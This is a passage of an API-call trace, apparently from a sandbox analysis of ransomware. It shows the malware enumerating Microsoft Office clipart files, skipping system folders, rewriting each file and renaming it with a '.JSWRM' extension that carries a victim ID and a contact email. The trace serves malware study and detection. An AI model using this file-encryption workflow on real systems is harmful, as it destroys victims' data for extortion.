(lpString1="BL00921_.WMF", lpString2="msocache") returned -1 [0075.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0075.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00921_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00921_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00921_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0075.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0075.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00921_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00921_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00921_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0075.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.103] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4408) returned 1 [0075.103] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1130) returned 0x24c1d0 [0075.103] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1130, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1130, lpOverlapped=0x0) returned 1 [0075.299] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.299] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1130, lpOverlapped=0x0) returned 1 [0075.299] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.300] CloseHandle (hObject=0x460) returned 1 [0075.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0075.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0075.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0075.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0075.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0075.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.300] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0075.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.301] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1870, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00923_.WMF", cAlternateFileName="")) returned 1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2=".") returned 1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="..") returned 1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="...") returned 1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="windows") returned -1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="recovery") returned -1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="perflogs") returned -1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="documents and settings") returned -1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="system volume information") returned -1 [0075.301] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="msocache") returned -1 [0075.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0075.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00923_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00923_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00923_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0075.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00923_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.301] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00923_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00923_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.302] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6256) returned 1 [0075.302] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1870) returned 0x24c1d0 [0075.302] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1870, lpOverlapped=0x0) returned 1 [0075.304] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.304] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1870, lpOverlapped=0x0) returned 1 [0075.304] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.304] CloseHandle (hObject=0x460) returned 1 [0075.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0075.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0075.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0075.305] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0075.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0075.305] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.305] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00923_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00923_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0075.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.306] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c14, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00932_.WMF", cAlternateFileName="")) returned 1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2=".") returned 1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="..") returned 1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="...") returned 1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="windows") returned -1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="recovery") returned -1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="perflogs") returned -1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="documents and settings") returned -1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="system volume information") returned -1 [0075.306] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="msocache") returned -1 [0075.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0075.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00932_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00932_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00932_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0075.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00932_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00932_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00932_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0075.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.306] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.307] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19476) returned 1 [0075.307] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.307] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4c10) returned 0x24c1d0 [0075.307] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4c10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4c10, lpOverlapped=0x0) returned 1 [0075.309] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.309] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4c10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4c10, lpOverlapped=0x0) returned 1 [0075.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.310] CloseHandle (hObject=0x460) returned 1 [0075.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0075.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0075.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0075.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0075.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0075.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.310] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00932_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00932_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0075.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.311] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeb8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00985_.WMF", cAlternateFileName="")) returned 1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2=".") returned 1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="..") returned 1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="...") returned 1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="windows") returned -1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="recovery") returned -1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="perflogs") returned -1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="documents and settings") returned -1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="system volume information") returned -1 [0075.311] lstrcmpiW (lpString1="BL00985_.WMF", lpString2="msocache") returned -1 [0075.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00985_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00985_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00985_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00985_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00985_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00985_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 